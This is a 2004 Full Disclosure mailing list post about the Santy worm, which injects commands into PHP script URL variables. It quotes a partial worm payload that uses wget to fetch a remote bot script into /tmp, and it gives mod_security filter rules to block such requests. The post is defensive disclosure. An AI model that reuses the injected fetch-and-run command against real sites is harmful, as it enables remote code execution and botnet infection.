Full Disclosure mailing list archives
Re: New Santy-Worm attacks *all* PHP-skripts
From: Paul Laudanski <zx () castlecops com>
Date: Sat, 25 Dec 2004 16:28:15 -0500 (EST)
On Sat, 25 Dec 2004, Juergen Schmidt wrote:
the new santy version not only attacks phpBB. It uses the brasilian Google site to find all kinds of PHP skripts. It parses their URLs and overwrites variables with strings like: 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;... Often enough this leads to download and execution of code. On success the worm connects to an IRC server, where already more than 700 zombies are waiting for commands.
My friend Suzi from http://spywarewarrior.com who runs Wordpress found this: http://wordpress.org/support/7/19285 Within five minutes I've logged over 600 attempts on my server. For those using mod_security, I'm implemented a nice 406 in the meantime, it is Christmas after all, I'm sure we want to elsewhere: [code] SecFilter "visualcoders\.net/spy\.gif\?\&cmd" SecFilter ":/" [/code] Just in case the URL changes, the latter should still get all sorts of: http:// ftp:// Naturally, the latter also filters on %3a%2f No Warranty ----------- ALL SUCH INFORMATION, SOFTWARE, PRODUCTS, AND SERVICES ARE PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. CASTLECOPS, ITS AFFILIATES, AND/OR THEIR RESPECTIVE SUPPLIERS HEREBY DISCLAIM ALL WARRANTIES AND CONDITIONS WITH REGARD TO THIS INFORMATION, SOFTWARE, PRODUCTS, AND SERVICES, INCLUDING ALL IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, AND NONINFRINGEMENT. http://castlecops.com/article1.html -- Regards, Paul Laudanski - Computer Cops, LLC. CEO & Founder CastleCops(SM) - http://castlecops.com Promoting education and health in online security and privacy. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Re: New Santy-Worm attacks *all* PHP-skripts Paul Laudanski (Dec 26)
- <Possible follow-ups>
- New Santy-Worm attacks *all* PHP-skripts Gary E. Miller (Dec 26)
- New Santy-Worm attacks *all* PHP-skripts Juergen Schmidt (Dec 29)
- Re: New Santy-Worm attacks *all* PHP-skripts Paul Laudanski (Dec 25)
- Re: New Santy-Worm attacks *all* PHP-skripts Paul Laudanski (Dec 27)
- Re: New Santy-Worm attacks *all* PHP-skripts Raistlin (Dec 26)
- Re: Re: New Santy-Worm attacks *all* PHP-skripts Paul Laudanski (Dec 26)
- Re: Re: New Santy-Worm attacks *all* PHP-skripts Steve Wray (Dec 29)
- Re: New Santy-Worm attacks *all* PHP-skripts Paul Laudanski (Dec 25)
- Re: New Santy-Worm attacks *all* PHP-skripts Pekka Savola (Dec 29)
- Re: New Santy-Worm attacks *all* PHP-skripts Juergen Schmidt (Dec 29)